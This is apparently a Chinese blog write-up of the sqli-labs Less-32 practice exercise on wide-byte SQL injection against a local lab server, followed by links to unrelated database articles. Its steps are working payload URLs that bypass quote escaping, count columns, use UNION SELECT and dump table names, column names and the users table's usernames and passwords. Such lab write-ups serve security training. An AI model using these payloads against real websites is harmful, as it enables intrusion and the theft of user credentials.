sql_lab之sqli中的宽字节注入(less32)

宽字节注入(less-32)

1.判断注入类型

http://127.0.0.3/less-32/?id=1

http://127.0.0.3/less-32/?id=1'

出现 \' 则证明是宽字节注入

2.构成闭环

http://127.0.0.3/less-32/?id=1�' -- s

显示登录成功则构成闭环

3.查询字段数

http://127.0.0.3/less-32/?id=1�' order by 4 -- s

http://127.0.0.3/less-32/?id=1�' order by 3 -- s

说明字段数为3

4.用union联合查询判断回显点

http://127.0.0.3/less-32/?id=-1�' union select 1,2,3 -- s 记住前面要加 - 因为不加 - 则会正常查询第一个数不会执行联合查询

5.查询数据库名

http://127.0.0.3/less-32/?id=-1�' union select 1,database(),3 -- s

6.查询表名

http://127.0.0.3/less-32/?id=-1�' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 -- s

爆出security里面的table表

7.查询字段名

http://127.0.0.3/less-32/?id=-1�' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 -- s

8.查username和password

http://127.0.0.3/less-32/?id=-1�' union select 1,group_concat(username),group_concat(password) from users -- s

相关推荐
麦兜*1 分钟前
Redis高可用架构设计:主从复制、哨兵、Cluster集群模式深度对比
java·数据库·spring boot·redis·spring·spring cloud·缓存
王嘉俊9252 分钟前
Redis 入门:高效缓存与数据存储的利器
java·数据库·redis·后端·spring·缓存·springboot
王维6 分钟前
【shardingsphere-jdbc】分表实践
java·数据库
xxy.c27 分钟前
基于IMX6ULL芯片--I2C总线简单应用
数据库·mongodb
cookqq27 分钟前
MongoDB源码分析慢日志:从配置到实现的完整解析
数据库·mongodb·nosql·慢日志
8K超高清32 分钟前
汇世界迎全运 广州国际社区运动嘉年华举行,BOSMA博冠现场展示并分享与科技全运的故事
运维·服务器·网络·数据库·人工智能·科技
come1123439 分钟前
深入Spring Boot生态中最核心部分 数据库交互spring-boot-starter-data-jpa和Hibernate (指南五)
数据库·spring boot·hibernate
不剪发的Tony老师1 小时前
dbswitch:一款免费开源、功能强大的异构数据库迁移同步工具
数据库·etl·dbswitch
计算机毕设残哥1 小时前
紧跟大数据技术趋势:食物口味分析系统Spark SQL+HDFS最新架构实现
大数据·hadoop·python·sql·hdfs·架构·spark
Crazy________2 小时前
13MySQL主从复制原理与搭建指南
数据库·mysql